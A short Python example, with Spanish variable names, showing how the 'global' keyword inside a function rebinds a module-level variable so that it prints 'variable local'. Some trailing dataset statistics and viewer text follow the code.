texto = "variable global"  # global variable
def funcion():
    # Because of `global`, the assignment below rebinds the module-level
    # `texto` instead of creating a function-local variable.
    global texto
    texto= "variable local"  # local variable (rebinds the global name)
funcion()
print(texto)  # prints "variable local": funcion() rebound the global
| 21.375
| 54
| 0.695906
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.